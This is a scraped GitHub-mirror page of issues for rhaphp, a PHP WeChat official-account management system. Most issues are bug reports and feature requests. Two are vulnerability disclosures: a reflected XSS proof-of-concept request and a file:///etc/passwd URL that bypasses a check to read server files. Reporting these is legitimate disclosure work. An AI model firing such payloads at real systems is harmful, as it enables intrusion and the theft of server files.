geesondog / rhaphp Goto Github PK
View Code? Open in Web Editor NEWRhaPHP是微信第三方管理平台,微信公众号管理系统,支持多公众号管理,CRM会员管理,小程序开发,APP接口开发、几乎集合微信功能,简洁、快速上手、快速开发微信各种各样应用。简洁、好用、快速、项目开发快几倍 。
Home Page: https://www.rhaphp.com/
RhaPHP是微信第三方管理平台,微信公众号管理系统,支持多公众号管理,CRM会员管理,小程序开发,APP接口开发、几乎集合微信功能,简洁、快速上手、快速开发微信各种各样应用。简洁、好用、快速、项目开发快几倍 。
Home Page: https://www.rhaphp.com/
现在的数据库配置是写死在config/database.php
文件里面的,不利于开发与部署,建议采用.env
进行配置,大概代码如下:
config/database.php
文件部分修改:
use think\facade\Env;
return [
// 数据库类型
'type' => 'mysql',
'hostname' => Env::get('database.hostname', '127.0.0.1'),
// 数据库名
'database' => Env::get('database.database', ''),
// 用户名
'username' => Env::get('database.username', 'root'),
// 密码
'password' => Env::get('database.password', ''),
// 端口
'hostport' => Env::get('database.hostport', ''),
];
站点目录下新增.env.example
文件:
[common]
app_debug = true
app_trace = false
[database]
hostname = 数据库地址
database = 数据库名称
username = 账号
password = 密码
hostport = 3306
prefix = rh_
部署的时候直接执行 cp .env.example .env
,然后再根据环境配置 .env
Hello 👋
I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@0xROI) has found a potential issue, which I would be eager to share with you.
Could you add a SECURITY.md
file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.
Looking forward to hearing from you 👍
(cc @huntr-helper)
在菜单添加了扫码推事件,但是好像扫码后并没有收到事件推送
index.php为什么不放在public下面,现在的位置岂不是可以访问所有的目录。
新关注人数实际为净增人数
admin能管理所有公众号
新添加的成员必须指定绑定公众号
非admin账号登录时将(当前公众号)自动切到绑定的公众号
并隐藏掉( 切换公众号、系统管理)两个菜单
公众号->自动回复 添加消息为图片类型时,上传图片为永久素材,无法上传
打开网站首页后404错误?权限给了777
app\common\model\MpMsg.php中函数messageListByGroup sql查询报错
$msgList = $this->where(['status' => $status, 'mpid' => $mid])->field('openid,count(msg_id) as msg_total')->group('openid')->order('msg_id DESC')->paginate(15);
此处order by msg_id有问题,order by只能是field中的字段
另建议不要在循环中查库,一次批量查出再在循环中组装
如何联系您?想有偿用一下你们商家入驻小程序的后台 [email protected]
查询显示菜单的时候mp->menu方法加上条件
->order('sort ASC')
POC - XSS
Parameters : keyword
Attack Pattern : keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
GET Request: http://10.21.42.29:81/mp/mp/autoreply.html
===================================================================
GET /mp/mp/autoreply.html?search_type=1&keyword=1234%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E HTTP/1.1
Host: 10.21.42.29:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.21.42.29:81/mp/mp/autoreply.html
Connection: close
Cookie: PHPSESSID=k2h7v7f0cflanglepjtsnr0jv6; think_admin=think%3A%7B%22id%22%3A%221%22%2C%22admin_name%22%3A%22admin123%22%2C%22password%22%3A%22fd9f12b2d09b5afd461f1a05cb66c8c6%22%2C%22status%22%3A%221%22%2C%22ip%22%3A%22127.0.0.1%22%2C%22last_time%22%3A%221550625853%22%2C%22rand_str%22%3A%22ZiEydp%22%2C%22admin_id%22%3A%221%22%7D
Upgrade-Insecure-Requests: 1
===================================================================
Vulnerability Code: https://github.com/geesondog/rhaphp/blob/master/application/mp/controller/Show.php#L21-L23
The vulnerability lies in the use of the strpos function instead of the substr function to determine whether the incoming value contains the keywords "http" or "https". This allows for certain methods to bypass the check.
Below is an example of how the vulnerability can be exploited:
/mp/Show/image?url=file:///etc/passwd#http
This can successfully read any file on the server.
*.Com/install跳转404?伪静态已经开启。
希望添加第三方登录授权模式授权管理公众号
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.